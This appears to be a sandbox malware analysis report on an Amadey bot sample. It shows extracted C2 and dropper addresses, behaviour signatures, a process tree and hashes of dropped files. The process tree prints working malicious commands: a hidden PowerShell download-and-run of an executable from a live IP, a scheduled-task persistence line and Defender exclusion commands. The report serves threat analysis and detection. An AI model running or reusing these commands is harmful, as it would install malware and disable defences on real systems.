Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250314-en
  • resource tags

    arch:x64arch:x86image:win11-20250314-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22/03/2025, 12:50

General

  • Target

    random.exe

  • Size

    938KB

  • MD5

    37de732974e6a068089e610463dfcf8d

  • SHA1

    06408e46cbed44313d25ca507d2e1c4b4153f483

  • SHA256

    1791b49625ea67a1035252f25b155627617e3c49053aa14012b6d194e60ccf5b

  • SHA512

    56136a23d177ceb2181f1301b426e459bac7096d0eb9d198f8cba11692ac2c7dbe34f11f578cc518ac0bc078343191b9b167f7f167fda4bde646f9e48bee8232

  • SSDEEP

    24576:NqDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:NTvC/MTQYxsWR7a0X

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 6 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 9 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2672
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn yNnjLmabGfh /tr "mshta C:\Users\Admin\AppData\Local\Temp\n6jJjxNeI.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3508
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn yNnjLmabGfh /tr "mshta C:\Users\Admin\AppData\Local\Temp\n6jJjxNeI.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3964
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\n6jJjxNeI.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5960
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YGGDE5XNNNTHSYBO5PRVNEPTJNZJOKSP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4852
        • C:\Users\Admin\AppData\Local\TempYGGDE5XNNNTHSYBO5PRVNEPTJNZJOKSP.EXE
          "C:\Users\Admin\AppData\Local\TempYGGDE5XNNNTHSYBO5PRVNEPTJNZJOKSP.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3792
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3412
            • C:\Users\Admin\AppData\Local\Temp\10299350101\laf6w_001.exe
              "C:\Users\Admin\AppData\Local\Temp\10299350101\laf6w_001.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:2980
              • C:\Windows\SYSTEM32\cmd.exe
                cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:6132
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe Add-MpPreference -ExclusionPath 'C:'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5160
              • C:\Windows\system32\svchost.exe
                "C:\Windows\system32\svchost.exe"
                7⤵
                • Downloads MZ/PE file
                • Adds Run key to start application
                • Suspicious use of WriteProcessMemory
                PID:1784
                • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe
                  "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe" ""
                  8⤵
                  • Sets service image path in registry
                  • Executes dropped EXE
                  • Suspicious behavior: LoadsDriver
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:5496
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Add-MpPreference -ExclusionPath C:\
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:14040
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Remove-MpPreference -ExclusionPath C:\
                    9⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:7032
                • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                  "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                  8⤵
                  • Deletes itself
                  • Executes dropped EXE
                  PID:3584
            • C:\Users\Admin\AppData\Local\Temp\10299360101\f43376e623.exe
              "C:\Users\Admin\AppData\Local\Temp\10299360101\f43376e623.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:14260
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:5796
            • C:\Users\Admin\AppData\Local\Temp\10299380101\tK0oYx3.exe
              "C:\Users\Admin\AppData\Local\Temp\10299380101\tK0oYx3.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:8124
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                  PID:4820
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:6128
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:128
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:2088

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe

      Filesize

      1.8MB

      MD5

      4ffd0bca9cd50d388b2aa181ead35e1c

      SHA1

      536af1ccd96a29ef97dbf219a250c4e5a0bfad54

      SHA256

      96264994c4909d2c24fa848cb5a2fafb86b131ff7a4b2dacd7858fb5da6b4906

      SHA512

      148d4d0203fe55f134a53082372055da213ddbe148c06f6c97fd056870db1b0d4eb657a62341b5d0c53e4925f592efa4717c29086498072a2f4fa0b9077f7014

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      627073ee3ca9676911bee35548eff2b8

      SHA1

      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

      SHA256

      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

      SHA512

      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      0c159e4c27795e9d644b50aac83df3e1

      SHA1

      4b00e8b21f23f127e8f3917286d889c81a939786

      SHA256

      39a6a65921ad81a0043f46839045fa390ae4d285382154bbe2fbbb76a517b1ca

      SHA512

      9840f77d45a06bffffec1bffd19c52a1a16de335d1dcce6cf6e4c6a668f0ef1f648661918ffe70a4bd7fa16334a73dcce0cb59f1b036c269a50827f8dab794f1

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      c6121e0c42fbe0338296040197abfe3f

      SHA1

      ba2d9897aa20d62e2c63fdfe041d4996cdd9a03d

      SHA256

      4d19541e2be70f2aad98180ad59670e499b790a0c47915d1e0a47fa0389b420c

      SHA512

      de07b297e99e79cf997f08cff4c209353282e66b531d8a7473075a8fa385c3b22a2f423a86e7c1204feaf998667636029cf42243660bbb5d9e5039c968b5d3ce

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      a973745dbf05015638bb99d89dc9260e

      SHA1

      ef5345108321a7f955f81a19d1378a883b759dbd

      SHA256

      f5908ea9d9208a3f069f81d956bc4b8adc14faf16685937720c3018e9c31d2bb

      SHA512

      78de7335f1ebcf740b0ae557beebe1c30bc1e1b7a54389855a247f07200cf257a2547956363894c570fffb14fa4ebf84cfd394de746712939b60f4243c2fcff4

    • C:\Users\Admin\AppData\Local\TempYGGDE5XNNNTHSYBO5PRVNEPTJNZJOKSP.EXE

      Filesize

      2.0MB

      MD5

      453e433ce707a2dff379af17e1a7fe44

      SHA1

      c95d4c253627be7f36630f5e933212818de19ed7

      SHA256

      ab8b903ee062c93347eb738d00d0dbf707cdbbb8d26cf4dac7691ccbf8a8aff2

      SHA512

      9aa5b06bf01017aa13fd57350ba627cc892246e55e5adf8d785ff8a2252da7cbc28cf5e5e4170d877e4be01538a230646cfc581873acf183f0485c66e6397fd4

    • C:\Users\Admin\AppData\Local\Temp\10299350101\laf6w_001.exe

      Filesize

      1.3MB

      MD5

      eb3f82a230c97746ad6fc272582ecece

      SHA1

      618bac114606764b85c734803007309660b76cf0

      SHA256

      2fdc0a416cdb38a430a54ea70de97e9c9c5968432e0057725aafdba803f278f2

      SHA512

      9e8ef67c90ec573cf7791d03b0e158e8323060edffb418fa3a4f22726848020fd194b6f83767cb8a3f54cfcff2ab901cb369f03de49fe686fba2a06265e4622e

    • C:\Users\Admin\AppData\Local\Temp\10299360101\f43376e623.exe

      Filesize

      1.1MB

      MD5

      999c92338f2c92dd095a74f0581fe012

      SHA1

      62d53a745cc4d83a0d00a865cf7f2ec28fb84b1b

      SHA256

      b28e8a5c04dbfcbf462014aedc83bafec26d0eedebefca620b740df26cb09700

      SHA512

      a94b4ba0c4677d0ac231f0047a1eb7556bf7b36b7bcda896782711ff3bb52800ab26f28fe36ef2d445dce3134d5ce8c024466451dd1e58842b5ebbe7e35a70e3

    • C:\Users\Admin\AppData\Local\Temp\10299370101\RrRYo50.exe

      Filesize

      1.5MB

      MD5

      8ddb337d795c13e189eb30fcaf743d91

      SHA1

      242b089f48199535d3466501c5537dfe3ad9eb6f

      SHA256

      022f971a2ff2007af90338e85b5ef1e7f384e5de112d323adc3b889bc207d025

      SHA512

      64577b39f8e2417914f13dd44f52c924663cecd4946adc8272878f41c5d3571ee9894d15449249a5f153783d8b0890483adf7d31edf19cd1825094589740e69b

    • C:\Users\Admin\AppData\Local\Temp\10299380101\tK0oYx3.exe

      Filesize

      1.1MB

      MD5

      292b5a2b7820688e131d541f18f48e84

      SHA1

      edb93c76c7edb5ebda65281f98fcc8e65ef3dbe5

      SHA256

      74c75de994a3d5033b78aa33774c8e85894869e12cd70376291dc0eb428fa7e8

      SHA512

      12d03a3cf95a10ab1555abe27f669f7073952d5d6a7ecadf739e3df4bf0e0712e1ae01e18ea9438eeb7cf3240965f4d86baef56871e11dfcf23cb9076014cf6e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pdm3lgjm.va1.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\n6jJjxNeI.hta

      Filesize

      717B

      MD5

      5ab6fbb7089825336e39ca1332b73114

      SHA1

      1e79dfc977abfda2eb68ea81831dee4af4433d19

      SHA256

      06d6a7d938ad459788a175d3fcd0f0c547d14cb72a36af7f27e7f04221bfc5aa

      SHA512

      e0b02eb3329e7bbfd6f69d55cd4979b386cf8306ec9fa7228ecace0c4df1f289f0ac409d7ce71aadc4bc0e151aaf2af9b9c0c3374c449fd7249bbeeaf9cd8951

    • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

      Filesize

      1.3MB

      MD5

      15bdc4bd67925ef33b926843b3b8154b

      SHA1

      646af399ef06ac70e6bd43afe0f978f0f51a75fd

      SHA256

      4f0b2c61bccfd9aa3db301ee4e15607df41ded533757de34c986a0ff25b6246d

      SHA512

      eac0736a06d0835758318d594d3560ee6be82889020a173463943956dd400d08cf1174a4c722dc45a3f3c034131982f4b19ff27db1163838afbfac37f397eaf8

    • memory/128-16185-0x0000000000BC0000-0x0000000001053000-memory.dmp

      Filesize

      4.6MB

    • memory/128-16183-0x0000000000BC0000-0x0000000001053000-memory.dmp

      Filesize

      4.6MB

    • memory/1784-70-0x0000000000960000-0x0000000000962000-memory.dmp

      Filesize

      8KB

    • memory/1784-79-0x0000020C5CB70000-0x0000020C5CBE1000-memory.dmp

      Filesize

      452KB

    • memory/1784-80-0x0000020C5CB70000-0x0000020C5CBE1000-memory.dmp

      Filesize

      452KB

    • memory/1784-71-0x0000020C5CB70000-0x0000020C5CBE1000-memory.dmp

      Filesize

      452KB

    • memory/1784-78-0x0000020C5CB70000-0x0000020C5CBE1000-memory.dmp

      Filesize

      452KB

    • memory/2088-16227-0x0000000000BC0000-0x0000000001053000-memory.dmp

      Filesize

      4.6MB

    • memory/2088-16229-0x0000000000BC0000-0x0000000001053000-memory.dmp

      Filesize

      4.6MB

    • memory/2980-67-0x0000000000400000-0x0000000000693000-memory.dmp

      Filesize

      2.6MB

    • memory/3412-47-0x0000000000BC0000-0x0000000001053000-memory.dmp

      Filesize

      4.6MB

    • memory/3412-93-0x0000000000BC0000-0x0000000001053000-memory.dmp

      Filesize

      4.6MB

    • memory/3792-46-0x0000000000D20000-0x00000000011B3000-memory.dmp

      Filesize

      4.6MB

    • memory/3792-31-0x0000000000D20000-0x00000000011B3000-memory.dmp

      Filesize

      4.6MB

    • memory/4852-21-0x0000000007560000-0x00000000075F6000-memory.dmp

      Filesize

      600KB

    • memory/4852-4-0x00000000051E0000-0x0000000005202000-memory.dmp

      Filesize

      136KB

    • memory/4852-23-0x00000000083E0000-0x0000000008986000-memory.dmp

      Filesize

      5.6MB

    • memory/4852-22-0x00000000074F0000-0x0000000007512000-memory.dmp

      Filesize

      136KB

    • memory/4852-2-0x0000000002B90000-0x0000000002BC6000-memory.dmp

      Filesize

      216KB

    • memory/4852-3-0x0000000005440000-0x0000000005A6A000-memory.dmp

      Filesize

      6.2MB

    • memory/4852-17-0x0000000006110000-0x000000000615C000-memory.dmp

      Filesize

      304KB

    • memory/4852-18-0x00000000077B0000-0x0000000007E2A000-memory.dmp

      Filesize

      6.5MB

    • memory/4852-19-0x0000000006590000-0x00000000065AA000-memory.dmp

      Filesize

      104KB

    • memory/4852-5-0x0000000005AE0000-0x0000000005B46000-memory.dmp

      Filesize

      408KB

    • memory/4852-6-0x0000000005B50000-0x0000000005BB6000-memory.dmp

      Filesize

      408KB

    • memory/4852-15-0x0000000005BC0000-0x0000000005F17000-memory.dmp

      Filesize

      3.3MB

    • memory/4852-16-0x0000000006060000-0x000000000607E000-memory.dmp

      Filesize

      120KB

    • memory/5160-86-0x00000156E8A80000-0x00000156E8AA2000-memory.dmp

      Filesize

      136KB

    • memory/5496-106-0x00000000008F0000-0x0000000000A78000-memory.dmp

      Filesize

      1.5MB

    • memory/5496-102-0x0000000140000000-0x0000000140403000-memory.dmp

      Filesize

      4.0MB

    • memory/5496-105-0x00000000008F0000-0x0000000000A78000-memory.dmp

      Filesize

      1.5MB

    • memory/5496-107-0x00000000008F0000-0x0000000000A78000-memory.dmp

      Filesize

      1.5MB

    • memory/5496-108-0x00000000008F0000-0x0000000000A78000-memory.dmp

      Filesize

      1.5MB

    • memory/5496-109-0x00000000008F0000-0x0000000000A78000-memory.dmp

      Filesize

      1.5MB

    • memory/5496-104-0x00000000008F0000-0x0000000000A78000-memory.dmp

      Filesize

      1.5MB

    • memory/5496-110-0x00000000008F0000-0x0000000000A78000-memory.dmp

      Filesize

      1.5MB

    • memory/5496-111-0x00000000008F0000-0x0000000000A78000-memory.dmp

      Filesize

      1.5MB